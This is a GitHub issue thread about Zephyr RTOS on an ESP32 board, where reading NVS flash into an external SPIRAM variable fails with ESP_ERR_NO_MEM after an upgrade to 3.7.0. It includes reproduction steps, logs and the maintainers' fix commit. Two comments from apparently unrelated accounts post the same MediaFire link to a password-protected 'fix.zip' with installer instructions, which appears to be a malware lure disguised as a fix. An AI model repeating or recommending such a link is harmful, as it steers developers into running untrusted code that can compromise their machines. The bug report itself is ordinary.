zephyrproject-rtos/zephyr #77551: ESP32 - NVS (flash) can't read to SPIRAM variable

real-tintin, 2024-08-26:
**Describe the bug**

We are in to process of bumping Zephyr from 3.4.0 to 3.7.0. We have a custom board based on ESP32-WROOM-32E-N8R2 e.g., 2MB of SPIRAM.

Amongst other, we use SPIRAM to hold larger static variables which are read/stored to flash via the NVS module (I assume that this is a general esp flash issue).

However, when reading from flash to a SPIRAM variable I now get:

`[00:00:00.844,000] <err> flash_esp32: esp_flash_read failed 257`

257 is ESP_ERR_NO_MEM.

**To Reproduce**
This can reproduced by building and running the NVS samples:

`west build -p -b esp32_devkitc_wrover/esp32/procpu ./zephyr_os/zephyr/samples/subsys/nvs`

 where the boot_counter is moved to SPIRAM:

`static uint32_t reboot_counter __attribute__((section(".ext_ram.bss")));`

and SPIRAM is enabled (append to prj.conf):

```
CONFIG_ESP_SPIRAM=y
CONFIG_SPIRAM_TYPE_ESPPSRAM16=y
```

this results in:

```
*** Booting Zephyr OS build v3.7.0-54-gc21332e1769b ***
[00:00:00.611,000] <dbg> fs_nvs: nvs_recover_last_ate: Recovering last ate from sector 1
[00:00:00.621,000] <inf> fs_nvs: 3 Sectors of 4096 bytes
[00:00:00.621,000] <inf> fs_nvs: alloc wra: 1, a78
[00:00:00.626,000] <inf> fs_nvs: data wra: 1, 4c8
Id: 1, Address: 192.168.1.1
Id: 2, Key: ff fe fd fc fb fa f9 f8 
[00:00:00.637,000] <err> flash_esp32: esp_flash_read failed 257
```

This works fine in 3.4.0.

**Expected behavior**
Can read from flash to a SPIRAM variable.

**Environment:**

 - OS: MacOS
 - Toolchain: Zephyr SDK 0.16.8 (Zephyr 3.4.0) and 0.16.5 (Zephyr 3.7.0)

llowvxe, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Qsgz2023ji5ban, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

sylvioalves, 2024-09-12:
@real-tintin Find the fix in #78234.

closed 2024-09-13 by mmahadevan108

real-tintin, 2024-10-07:
> @real-tintin Find the fix in #78234.

Much appreciated. Will this be included in an upcoming 3.7.1 release?

commit aa3dd674 (2024-09-13): soc: esp32xx: update flash initialization

Rework how flash is initialized in esp32 SoC.
"esp_flash_app_init()" will make sure proper cache handling
will be set in place.i

Fixes #77551